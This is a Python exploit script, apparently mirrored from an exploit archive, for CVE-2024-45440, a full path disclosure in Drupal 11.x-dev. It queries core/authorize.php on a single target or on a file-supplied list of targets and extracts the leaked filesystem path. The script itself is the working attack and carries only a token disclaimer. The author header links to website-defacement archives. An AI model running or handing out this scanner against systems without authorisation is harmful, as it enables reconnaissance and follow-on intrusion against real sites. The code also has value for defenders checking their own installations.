## https://sploitus.com/exploit?id=PACKETSTORM:190573
#!/usr/bin/env python
    # Exploit Title: Drupal 11.x-dev - Full Path Disclosure
    # Date: 2025-04-16
    # Exploit Author: Milad Karimi (Ex3ptionaL)
    # Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
    # MiRROR-H: https://mirror-h.org/search/hacker/49626/
    # Version: 11.x-dev
    # CVE: CVE-2024-45440
    
    # -*- coding:UTF-8 -*-
    import re
    import requests
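    def banners():
        """Build the start-up banner shown before the menu.

        The banner names the CVE this checker looks for, summarises the
        condition that triggers the disclosure, and carries the author's
        disclaimer, framed above and below by a 100-character rule.

        Returns:
            str: The multi-line banner text.
        """
        cve_id = "CVE-2024-45440"
        # Every literal is written whole: the listing as published had these
        # strings hard-wrapped in the middle, which left them unterminated and
        # made the module fail to parse.
        description = (
            "Drupal 11.x-dev Full Path Disclosure Vulnerability: "
            "core/authorize.php allows Full Path Disclosure (even when error logging is None) "
            "if the value of hash_salt is file_get_contents of a file that does not exist."
        )
        disclaimer = (
            "This tool is for educational purposes only. Any misuse of this information is the responsibility of "
            "the person utilizing this tool. The author assumes no responsibility or liability for any misuse or "
            "damage caused by this program."
        )
        width = 100
        banner_top_bottom = "=" * width
        # The description is longer than ``width``, so centring only affects
        # the CVE id line; the description is emitted as-is.
        banner_middle = f"{cve_id:^{width}}\n\n{description:^{width}}"
        banner = f"{banner_top_bottom}\n\n{banner_middle}\n\n{disclaimer}\n\n{banner_top_bottom}"

        return banner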
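    def scan_single_url(url=None):
        """Check one host for the CVE-2024-45440 full path disclosure.

        Requests ``/core/authorize.php`` and looks for an absolute path ending
        in ``settings.php`` inside an ``<em class="placeholder">`` element of
        the response. A hit means the page is echoing the server's filesystem
        layout to unauthenticated clients. Per the advisory text in the banner
        this happens when ``hash_salt`` is read with ``file_get_contents`` from
        a file that does not exist, so on an affected site the remedy is to
        make that file exist (or set the salt directly) and to move to a
        Drupal release that carries the fix for this CVE.

        Args:
            url: Host, ``host:port`` or a full ``http(s)://`` base URL. When
                ``None`` the value is read interactively.

        Returns:
            bool: True when at least one path was found in the response,
            False otherwise (including empty input, timeouts and request
            errors).
        """
        if url is None:
            print("[+] Input the IP/Domain Example: 127.0.0.1 or 127.0.0.1:8080")

            url = input("[+] IP/Domain: ")
        url = url.strip()
        if not url:
            # Blank lines in a target file used to produce a malformed request.
            print("[-] Empty input!")
            return False
        # The endpoint is built for both cases; previously ``full_url`` was
        # only assigned when no scheme was given, so any input that already
        # carried http(s):// died with a NameError reported as "Failed!".
        if url.startswith(('http://', 'https://')):
            base_url = url
        else:
            base_url = 'http://' + url
        full_url = base_url.rstrip('/') + '/core/authorize.php'
        print("[*] Scanning...")
        # No explicit Host header: requests derives it from the URL, and the
        # raw input may contain a scheme, which is not a valid Host value.
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        }
        pattern = r'<em class="placeholder">(/.*?settings\.php)'
        try:
            # ``headers`` must be passed by keyword: the second positional
            # argument of requests.get is ``params``, so the dict was being
            # sent as a query string instead of as request headers.
            response = requests.get(full_url, headers=headers, timeout=10)
            matches = re.findall(pattern, response.text)
        except requests.exceptions.Timeout:
            # requests raises its own Timeout type, which is not the builtin
            # TimeoutError the original clause was waiting for.
            print(f"[-] {url} Timeout!")
            return False
        except Exception:
            # Deliberately broad: the batch mode relies on this never raising.
            print(f"[-] {url} Failed!")
            return False
        # Decide on the extracted path, not on the bare substring
        # 'settings.php', which can appear in unrelated page content and
        # previously produced "Existed!" with no path and a None return.
        if not matches:
            print(f"[-] {url} Not Exist!")
            return False
        print(f"[+] {url} Existed!")
        for match in dict.fromkeys(matches):
            print("[+] The full path is:", match)
        return True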
    def scan_multiple_urls():
        """Run the single-host check over every line of a text file.

        Prompts for the file path, reads it as UTF-8 with one target per line
        (surrounding whitespace stripped, blank lines passed through as empty
        strings), calls ``scan_single_url`` on each entry in file order and
        finally prints the entries for which it returned a truthy value.

        A missing file is reported and the run continues with an empty target
        list, so the summary header is still printed.
        """
        print("[+] Input the path of txt Example: ./url.txt or C:\\the\\path\\to\\url.txt")
        url_path = input("[+] Path: ")
        targets = []
        try:
            with open(url_path, 'r', encoding='utf-8') as handle:
                targets = [entry.strip() for entry in handle]
        except FileNotFoundError:
            print("[-] File Not Found!")
        # Checks run sequentially, in the order the targets appear in the file.
        hits = [target for target in targets if scan_single_url(target)]
        print("[+] Successful Target:")
        for hit in hits:
            print(f"[+] {hit}")
    def main():
        """Print the banner and menu, then run the scan mode the user picks.

        ``1`` starts the interactive single-host check, ``2`` the file-driven
        batch check; any other input prints an error and returns.
        """
        print(banners())
        print("[1] Scan single url\n[2] Scan multiple urls")
        actions = {'1': scan_single_url, '2': scan_multiple_urls}
        selected = actions.get(input("[+] Choose: "))
        if selected is None:
            print("[-] Invalid option selected!")
            return
        selected()
    # Start the interactive menu only when run as a script, not on import.
    if __name__ == "__main__":
        main()